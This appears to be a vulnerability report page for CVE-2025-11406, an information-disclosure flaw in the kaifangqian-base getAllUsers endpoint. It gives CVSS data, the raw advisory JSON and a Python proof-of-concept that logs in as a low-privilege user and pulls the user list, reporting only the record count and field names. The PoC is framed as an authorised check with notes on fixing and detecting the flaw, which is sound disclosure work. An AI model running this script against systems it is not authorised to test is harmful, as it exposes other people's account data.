Security Vulnerability Report
CVE-2025-11406 CVSS 4.3 MEDIUM

CVE-2025-11406

Published: 2025-10-07 20:15:33
Last Modified: 2026-04-29 01:00:02

Description

A security flaw has been discovered in kaifangqian kaifangqian-base up to 7b3faecda13848b3ced6c17c7423b76c5b47b8ab. This issue affects the function getAllUsers of the file kaifangqian-parent/kaifangqian-system/src/main/java/com/kaifangqian/modules/system/controller/SysUserController.java. The manipulation results in information disclosure. The attack can be launched remotely. The exploit has been released to the public and may be exploited. This product does not use versioning, so information about affected and unaffected releases is unavailable.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

kaifangqian kaifangqian-base (commit 7b3faecda13848b3ced6c17c7423b76c5b47b8ab and earlier)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
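#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CVE-2025-11406 check - kaifangqian-base getAllUsers Information Disclosure

Verifies, against a system you are authorized to test, whether a
low-privileged authenticated user can retrieve the full user list from the
kaifangqian getAllUsers endpoint.

Only the record count and the field names are reported. Record contents are
deliberately not printed, so the test output does not become a second copy of
the disclosed data.

NOTE(review): the login path, the "code"/"data"/"message" response envelope
and the Bearer token scheme are assumptions of this script, not facts stated
in the advisory - confirm them against the deployment under test.

Defensive notes:
  * The advisory classifies the flaw as CWE-200 / CWE-284, so the fix
    direction is presumably a server-side role/permission check on
    getAllUsers plus trimming the returned fields to what the caller is
    entitled to see.
  * For detection, review access logs for successful requests to the
    getAllUsers path (as used below) made by non-administrative accounts.
"""

import json
import sys

import requests

# Configuration
TARGET_URL = "http://target-host:port"  # Placeholder: replace with the authorized test target
LOGIN_URL = f"{TARGET_URL}/sys/login"
GET_ALL_USERS_URL = f"{TARGET_URL}/sys/user/getAllUsers"

# Low-privilege test account (placeholders - never commit real credentials)
USERNAME = "low_priv_user"
PASSWORD = "password123"

# Seconds to wait for each HTTP request before giving up.
REQUEST_TIMEOUT = 10


def _json_object(resp):
    """Return the response body as a dict, or None if it is not a JSON object."""
    try:
        body = resp.json()
    except ValueError:
        # requests raises a ValueError subclass when the body is not valid JSON.
        return None
    return body if isinstance(body, dict) else None


def login(session, username, password):
    """Authenticate and return the session token.

    Args:
        session: a requests.Session (or compatible object) used for the call.
        username: account name of the low-privilege test user.
        password: password of that account.

    Returns:
        The token string, or None when the request fails, the server rejects
        the login, or no token is present in the response.
    """
    credentials = {"username": username, "password": password}
    try:
        resp = session.post(LOGIN_URL, json=credentials, timeout=REQUEST_TIMEOUT)
    except requests.RequestException as exc:
        print(f"[-] Login failed: {exc}")
        return None

    if resp.status_code != 200:
        print(f"[-] Login failed with status: {resp.status_code}")
        return None

    result = _json_object(resp)
    if result is None:
        print("[-] Login failed: response is not a JSON object")
        return None
    if result.get("code") != 200:
        print(f"[-] Login rejected: {result.get('message')}")
        return None

    # "data" may be missing or null; treat both as an empty payload.
    payload = result.get("data")
    if not isinstance(payload, dict):
        payload = {}
    token = payload.get("token") or payload.get("access_token")
    if not token:
        # Do not report success when there is nothing to authenticate with.
        print("[-] Login response contained no token")
        return None

    print("[+] Login successful, token obtained")
    return token


def exploit_get_all_users(session, token):
    """Request the getAllUsers endpoint with a low-privilege token.

    Prints the number of records returned and the field names they carry,
    never the record values.

    Args:
        session: a requests.Session (or compatible object) used for the call.
        token: token returned by login().

    Returns:
        The list of user records when the endpoint answers successfully,
        otherwise None.
    """
    headers = {
        "Authorization": f"Bearer {token}",
        "Content-Type": "application/json",
    }
    try:
        resp = session.get(GET_ALL_USERS_URL, headers=headers, timeout=REQUEST_TIMEOUT)
    except requests.RequestException as exc:
        print(f"[-] Request failed: {exc}")
        return None

    if resp.status_code != 200:
        print(f"[-] Request failed with status: {resp.status_code}")
        return None

    body = _json_object(resp)
    if body is None:
        print("[-] Request failed: response is not a JSON object")
        return None
    if body.get("code") != 200:
        print(f"[-] API returned error: {body.get('message')}")
        return None

    users = body.get("data")
    if users is None:
        users = []
    if not isinstance(users, list):
        print("[-] Unexpected response shape: 'data' is not a list")
        return None

    print(f"[+] Endpoint returned {len(users)} user records")

    # Report which attributes are exposed without echoing any values.
    exposed_fields = set()
    for record in users:
        if isinstance(record, dict):
            exposed_fields.update(record)
    print("[*] Exposed field names (values withheld):")
    print(json.dumps(sorted(exposed_fields), ensure_ascii=False, indent=2))
    return users


def main():
    """Log in with the low-privilege account and check the endpoint."""
    session = requests.Session()

    print("[*] CVE-2025-11406 check - kaifangqian Information Disclosure")
    print(f"[*] Target: {TARGET_URL}")

    # Step 1: Login with low-privilege account
    token = login(session, USERNAME, PASSWORD)
    if not token:
        print("[-] Cannot proceed without valid token")
        sys.exit(1)

    # Step 2: Ask getAllUsers for the user list with that token
    users = exploit_get_all_users(session, token)
    if users:
        print(f"\n[!] Total user records disclosed to a low-privilege account: {len(users)}")
        print("[!] Restrict getAllUsers to authorized roles and limit the fields it returns")
    elif users is not None:
        print("\n[*] Endpoint answered successfully but returned no user records")


if __name__ == "__main__":
    main()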

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11406", "sourceIdentifier": "[email protected]", "published": "2025-10-07T20:15:33.190", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in kaifangqian kaifangqian-base up to 7b3faecda13848b3ced6c17c7423b76c5b47b8ab. This issue affects the function getAllUsers of the file kaifangqian-parent/kaifangqian-system/src/main/java/com/kaifangqian/modules/system/controller/SysUserController.java. The manipulation results in information disclosure. The attack can be launched remotely. The exploit has been released to the public and may be exploited. This product does not use versioning. This is why information about affected and unaffected releases are unavailable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://flowus.cn/share/71182903-2a36-488f-ac3f-4f94c725f545?code=6HT9ZE", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.327343", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.327343", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.665162", "source": "[email protected]"}]}}